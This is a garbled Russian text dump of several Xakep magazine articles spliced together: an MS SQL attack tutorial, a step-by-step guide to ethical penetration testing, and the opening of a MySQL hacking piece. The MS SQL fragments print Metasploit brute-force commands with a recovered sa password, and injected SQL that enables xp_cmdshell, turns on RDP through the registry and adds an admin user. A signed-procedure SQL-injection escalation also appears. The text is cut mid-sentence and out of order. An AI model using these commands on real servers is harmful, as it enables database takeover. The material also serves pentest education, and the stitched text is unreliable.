книги хакеры / журнал хакер / 195_Optimized

Проверяем MS SQL на прочность

Arthimedes@shutterstock.com

ПРОВЕРЯЕМ

MS SQL

НАПРОЧНОСТЬ

ВЕКТОРЫ АТАК

НА MS SQL SERVER

Взлом

MS SQL на атакуемом сервере:

msf> use auxilary/scanner/mssql/mssql_ping

msf auxilary(mssql_ping) > set RHOSTS 192.167.1.87

RHOSTS => 192.168.1.87

msf auxilary(mssql_ping) > run

Используя один из данных вариантов, можно быстренько определить, установлен ли на сервере MS SQL, а также узнать его версию. После чего можно переходить к следующему этапу.

BRUTE FORCE

Допустим, СУБД на сервере мы обнаружили. Теперь стоит задача получить к ней доступ. И тут нас встречает первое препятствие в виде аутентификации. Вообще, MS SQL поддерживает два вида аутентификации:

1.Windows Authentication — доверительное соединение, при котором SQL Server принимает учетную запись пользователя, предполагая, что она уже проверена на уровне операционной системы.

2.Смешанный режим — аутентификация средствами SQL Server + Windows Authentication.

По умолчанию используется первый режим аутентификации, а смешанный режим активируется отдельно. На практике же довольно трудно встретить базу без смешанного режима — он более гибок.

Обычно на данном этапе мы не имеем доступа в корпоративную сеть, тем самым использовать аутентификацию посредством Windows не можем. Но мы нашли открытый порт с MS SQL, значит, пробуем побрутить админскую учетку sa,

1

2

стандартную для смешанного режима. Для автоматизации процесса используем модуль Метасплоита mssql_login:

msf > use auxiliary/scanner/mssql/mssql_login

msf auxiliary(mssql_login) > set RHOSTS

172.16.2.104

Проверяем MS SQL на прочность

RHOSTS => 172.16.2.104

msf auxiliary(mssql_login) > set PASS_FILE/root/

Desktop/pass.txt

[*]172.16.2.104:1433 - MSSQL - Starting authentication scanner.

[*]172.16.2.104:1433 - LOGIN FAILED:WORKSTATION\ sa:admin (Incorrect: )

[*]172.16.2.104:1433 - LOGIN FAILED:WORKSTATION\ sa:qwerty (Incorrect: )

[*]172.16.2.104:1433 - LOGIN FAILED: WORKSTATION\

sa:toor (Incorrect: )

[+]172.16.2.104:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:root

[*]Scanned 1 of 1 hosts (100% complete)

[*]Auxiliary module execution completed

Отлично! Пароль найден, теперь можем переходить к следующему этапу. Но что, если учетки sa на сервере не окажется? Тогда придется брутить и логин, для чего необходимо будет указать скрипту еще один файл, откуда их брать:

msf auxiliary(mssql_login) > set USER_FILE /root/

Desktop/user.txt

1.10; EXEC sp_configure 'show advanced options',1;

2.10; reconfigure;

3.10; ‘exec sp_configure 'xp_cmdshell',1;

4.10; reconfigure

Системная хранимая процедура sp_configure позволяет просматривать, документировать, изменять и восстанавливать конфигурацию сервера. Наиболее простой способ получить доступ к серверу — включить RDP через реестр, создать пользователя с админскими правами и подключиться.

Включаем RDP:

10; reg add "HKEY_LOCAL_MACHINE\SYSTEM\Current

ControlSet\Control\Terminal Server" /v fDeny

TSConnections /t REG_DWORD /d 0 /f

Создаем пользователя:

10; exec master.dbo.xp_cmdshell 'net user

root toor /ADD'

Даем права:

10;exec master.dbo.xp_cmdshell 'net

Взлом

Проверяем MS SQL на прочность

CREATE LOGIN tor WITH PASSWORD = 'loki';

GO

-- Set login’s default database

ALTER LOGIN [tor] with default_database = [master];

GO

Выключим свойство TRUSTWORTHY: ALTER DATABASE master SET TRUSTWORTHY OFF. И создадим простую хранимую процедуру sp_xxx, которая будет выводить столбец name из базы tempdb, а также из базы, которую ввел пользователь:

USE MASTER;

GO

CREATE PROCEDURE sp_xxx

@DbName varchar(max)

AS

BEGIN

Declare @query as varchar(max)

SET @query = 'SELECT name FROM master.

.sysdatabases where name like ''%'+ @DbName+'%''

OR name=''tempdb''';

EXECUTE(@query)

END

GO

После этого создадим ключ шифрования для базы

MASTER:

CREATE MASTER KEY ENCRYPTION BY PASSWORD =

'secret';

GO

И сертификат:

CREATE CERTIFICATE sp_xxx_cert

WITH SUBJECT = 'To sign the sp_xxx',

EXPIRY_DATE = '2035-01-01';

GO

Следующим шагом создадим логин из сертификата sp_ xxx:

CREATE LOGIN sp_xxx_login

FROM CERTIFICATE sp_xxx_cert

И подпишем процедуру созданным сертификатом:

ADD SIGNATURE to sp_xxx

BY CERTIFICATE sp_xxx_cert;

GO

Присвоим логину sp_xxx_login привилегии sysadmin:

EXEC master..sp_addsrvrolemember @loginame = N'

sp_xxx_login', @rolename = N'sysadmin'

GO

Дадим привилегии членам группы PUBLIC исполнять процедуру:

GRANT EXECUTE ON sp_xxx to PUBLIC

В итоге мы создали пользователя tor с минимальными правами, хранимую процедуру sp_xxx, которая выводит имя введенной базы, создали сертификат sp_xxx_cert и подписали им хранимую процедуру, а также создали логин sp_ xxx_login из сертификата и дали ему привилегии sysadmin. На этом подготовительная часть закончена. Логинимся учетной записью tor и вызываем хранимую процедуру:

EXEC MASTER.dbo.sp_xxx 'master'

Как и положено, она вернет нам имя указанной нами БД — master и tempdb (см. рис. 3).

Запрос вида EXEC MASTER.dbo.sp_sqli2 'master''--'

вернет уже только master (см. рис. 4).

Взлом

Юрий Гольцев

Профессиональный white hat, специалист по ИБ, еженедельно проводящий множество этичных взломов крупных организаций, редактор рубрики Взлом, почетный член команды X

@ygoltsev

от старта до окончания согласования занимает один-два рабочих дня.

В зависимости от пожеланий заказчика этот этап может быть пропущен, но, на мой взгляд, этого делать не стоит — порой действительно интересно узнать, насколько полно можно составить картину сетевого периметра организации.

ШАГ 4. ИНВЕНТАРИЗАЦИЯ СЕРВИСОВ

После того как сетевой периметр согласован, можно с чистой совестью приступать к инвентаризации сервисов, которые на нем доступны. При этом нужно не забыть уведомить заказчика и предоставить IP-адреса, с которых будут проводиться работы. Предположим, что на сетевом периметре заказчика отсутствуют IPS/ IDS-системы. Это избавляет пентестера от возможных проблем с банами адресов. Вопросы, которые касаются банов адресов «атакующего», обговариваются с заказчиком в рабочем порядке, чтобы избежать любых недопониманий и недоразумений.

По результатам инвентаризации формируется список сервисов, которые доступны на сетевом периметре. Процедура может занимать от нескольких дней до нескольких недель — в зависимости от количества узлов.

В большинстве организаций для внешнего сетевого периметра характерны следующие типовые сервисы:

•веб-приложения;

•корпоративные приложения;

•почта;

•менеджмент-сервисы;

•сервисы сетевой инфраструктуры.

ШАГ 5. ПОИСК «ВНЕШНИХ» УЯЗВИМОСТЕЙ

Этичный хакер производит поиск уязвимостей, информация о которых доступна в публичных источниках. Проверяется каждый сервис, доступный на сетевом периметре. Естественно, подобные действия автоматизированы, и никто не занимается поиском информации об уязвимостях по фингерпринтингу сервисов в поисковиках. Параллельно с этим проводится поиск уязвимостей вручную, с использованием всех известных пентестеру методов и подходов. Немалую роль в этом деле играет интуиция, которая формируется со временем на основе опыта. Процесс может занимать от нескольких дней до нескольких недель — опять же все зависит от количества узлов.

ШАГ 6. ЭКСПЛУАТАЦИЯ «ВНЕШНИХ» УЯЗВИМОСТЕЙ

Завершив поиск «внешних» уязвимостей, этичный хакер выделяет для себя уязвимые сервисы, эксплуатация которых возможна как теоретиче-

Пошаговый гайд по этичному взлому

ски, так и практически (выполнены необходимые условия для эксплуатации, имеется PoC, есть возможность разработать эксплойт за небольшой промежуток времени).

После этого полученный список сервисов условно делится по принципу безопасности эксплуатации уязвимостей. Уязвимости, эксплуатация которых никак не нарушит целостности и доступности чего-либо, используются в первую очередь. К этой группе в том числе относятся уязвимости, характерные для веб-приложений, например LFI.

Остальные уязвимости, эксплуатация которых может потенциально привести к нарушению целостности или доступности сервиса, проверяются только по согласованию с заказчиком. Для этого на стороне заказчика выбирается ответственный, который следит за работоспособностью уязвимого сервиса в тот момент, когда этичный хакер производит эксплуатацию. В случае «падения» сервиса человек на стороне заказчика сможет оперативно восстановить его работу. На данном этапе этичный хакер уже предоставляет заказчику краткую информацию обо всех обнаруженных критичных уязвимостях на сетевом периметре и рекомендации по их устранению.

ШАГ 7. ПРЕОДОЛЕНИЕ ПЕРИМЕТРА

В результате удачной эксплуатации найденных уязвимостей этичный хакер получает доступ того или иного рода к узлам на сетевом периметре. Обладая им, пентестер ищет возможность выполнять локальные команды ОС. Когда такая возможность получена, он проверяет, имеет ли узел доступ во внутреннюю сеть и целесообразно ли использовать его как точку проникновения внутрь. Если узел имеет несколько сетевых интерфейсов, на которых заасайнены локальные адреса, то он с большой вероятностью подходит для развития атаки во внутреннюю сеть. На каждом из таких узлов этичный хакер «закрепляется» — максимально упрощает работу с ОС узла и строит канал, позволяющий осуществлять доступ во внутреннюю сеть организации.

По факту преодоления периметра этичный хакер строит набор возможных векторов развития атаки во внутреннюю сеть и каждый согласует с заказчиком. После согласования можно приступить к развитию атаки во внутреннюю сеть.

ШАГ 8. РЕКОН И ИНВЕНТАРИЗАЦИЯ ВО ВНУТРЕННЕЙ СЕТИ

Этот этап работ может осуществляться как удаленно, с использованием точек входа, полученных на предыдущем этапе, так и локально, когда хакер находится на территории офиса клиента. Все зависит от договоренности с заказчиком. В большинстве случаев, чтобы убить двух зайцев сразу и рассмотреть модель инсайдера, работы проводятся на территории офиса заказчика. Хотя на самом деле все проверки можно провести удаленно.

Если область атаки никак не обговорена, то она представляет собой весь перечень существующих во внутренней сети узлов. Инвентаризация доступных сервисов занимает какое-то время, так что обычно параллельно с этим этичный хакер ищет наиболее простые и доступные для эксплуатации уязвимости. Например, в сервисах MS SQL может быть заведен пользователь sa, и ему никто не удосужился установить сложный пароль, или установлен Apache Tomcat с дефолтовой учеткой администратора. Хакер концентрируется на поиске уязвимостей, которые помогут эффективно и быстро повысить привилегии в ИС и эксплуатация которых не требует

какого-либо согласования с заказчиком, то есть в 100% случаев не может послужить причиной нарушения целостности и доступности сервиса. Обычно процесс рекона и некоторой инвентаризации занимает не более одного дня.

ШАГ 9. ПОИСК «ВНУТРЕННИХ» УЯЗВИМОСТЕЙ

Автоматизация — наше все. Без автоматизированных средств поиска уязвимостей увидеть полную картину абсолютно невозможно. Чем больше действий автоматизировано, тем больше информации ты получишь на выходе и тем более грамотно сможешь ей оперировать. На стадии автоматизированного сканирования обычно выявляются сервисы, которые можно

инужно изучить поближе, — в основном это те или иные кастомные приложения либо сервисы, содержащие уязвимости, эксплойтов к которым нет в паблике. Так что основное время пентестер посвящает работе с такими сервисами, чтобы позже автоматизировать действия с ними

ибольше на это не отвлекаться.

ШАГ 10. ЭКСПЛУАТАЦИЯ «ВНУТРЕННИХ» УЯЗВИМОСТЕЙ

Эксплуатация уязвимостей на этапе работы во внутренней сети мало чем отличается от их эксплуатации на сетевом периметре. Не стоит, впрочем, забывать о возможности атак на канальный уровень, которые могут очень сильно помочь и проведение которых непременно нужно согласовать с заказчиком. Еще важно помнить, что кастомные сервисы, запущенные внутри, скорее всего, нестабильны. Если начать с ними некорректно обращаться, то они, скорее всего, вскоре упадут.

ШАГ 11. ПОЛУЧЕНИЕ ДОСТУПА К ЦЕЛЕВЫМ СИСТЕМАМ

Многих заказчиков интересует возможность получения доступа к определенным бизнес-прило- жениям или целевым рабочим станциям. В таком случае работа в этом направлении движется сразу по двум траекториям: первая подразумевает стремление повысить привилегии в основных компонентах ИС, после чего, используя полученные привилегии, получить доступ к обозначенным целям легитимными методами; вторая траектория — это «раскрутка» сервисов на целевых узлах. На практике вторая траектория более трудоемка, и зачастую на ее полную реализацию просто не хватает времени.

ШАГ 12. ПОДГОТОВКА ОТЧЕТА

По завершении всех практических работ этичный хакер приступает к подготовке технического отчета. Помимо информации обо всех критичных уязвимостях, отчет содержит полное описание хода работ — действия хакера в формате «история взлома». На основе данных о найденных уязвимостях готовятся рекомендации по их устранению. В том случае, когда информации об уязвимости в публичном доступе нет, пентестер готовит advisory. Эта сводка попадает в отчет в качестве рекомендации по временному устранению уязвимости, а также уходит вендору уязвимого продукта. После того как технический отчет готов, вычитан и оформлен, он передается заказчику на согласование. Когда отчет будет согласован, можно немного выдохнуть и поставить в уме +1 к числу выполненных проектов.

ШАГ 13. ПОДГОТОВКА ПРЕЗЕНТАЦИИ

Презентация по результатам работ — один из ключевых моментов, говорящих о том,

что проект для этичного хакера завершен. Контент для презентации подбирается в зависимости от того, для кого заказчик работ хочет ее провести.

HAPPY ENDING

Завершение проекта тестирования на проникновение обычно дает старт проекту внутри тестируемой организации по устранению выявленных недостатков. На протяжении этого проекта специалисты заказчика вправе обратиться за разъяснениями к этичному хакеру. Stay tuned!

ПОЛЕЗНАЯ

ИНФОРМАЦИЯ

Общая теория по пентестам

•Vulnerability Assessment (bit.ly/17lVCDU)

•Open Source Security Testing Methodology Manual (bit.ly/U9WpQY)

•The Penetration Testing Execution Standard (bit.ly/1KNe7iF)

Немного практики

•PentesterLab (bit.ly/1uJ3RUu)

•Penetration Testing Practice Lab (bit.ly/1fb61kO)

В закладки

•Open Penetration Testing Bookmarks Collection

(bit.ly/1vncteH)

Базовые технические инструкции

•PTES Technical Guidlines (bit.ly/1nPfqEU)

Recon

•Intelligence Gathering (bit.ly/1C9U3X5)

•theHarvester (bit.ly/1fqagdX)

•recon-ng (bit.ly/18Dcs0F)

•BGP Toolkit (bit.ly/1yA1p43)

•Pastebin Scrapper (bit.ly/1wy8P7r)

Инвентаризация сервисов

•Nmap (bit.ly/1Bv1PJ3)

•MasScan (bit.ly/1pSDGls)

Автоматизированный поиск уязвимостей

•OpenVAS (bit.ly/1Ahucq3)

•Nessus (bit.ly/1C9Uroo)

•Nexpose (bit.ly/1Ahuey4)

Эксплуатация уязвимостей

•Metasploit (bit.ly/1elvBXe)

•Core Impact (bit.ly/19e7dWC)

•Immunity Canvas (bit.ly/1L1rmQb)

•Exploit-DB (bit.ly/1hLNOPD)

Туннелирование трафика

•SSH-туннелирование (bit.ly/1F2xnqG)

•reDuh (bit.ly/19e7gS7)

•HTTP Tunnel (bit.ly/1D9EPRY)

•WSO (bit.ly/1NOocOP)

Взлом

Егор Карбутов Digital Security

@Lukesparamore, lukesparamore@gmail.com

ИГРАЕМ

МУСКУЛАМИ

МЕТОДЫ И СРЕДСТВА ВЗЛОМА БАЗ ДАННЫХ MYSQL

MySQL — одна из самых распространенных СУБД. Ее можно встретить повсюду, но наиболее часто она используется многочисленными сайтами. Именно поэтому безопасность базы данных — очень важный вопрос, ибо если злоумышленник получил доступ к базе, то есть большая вероятность, что он скомпрометирует не только ресурс, но и всю локальную сеть. Поэтому я решил собрать всю полезную инфу по взлому и постэксплуатации MySQL, все трюки и приемы, которые используются при проведении пентестов, чтобы ты смог проверить свою СУБД. 0day-техник тут не будет: кто-то еще раз повторит теорию, а кто-то почерпнет что-то новое. Итак, поехали!

RYGER@shutterstock.com

Играем мускулами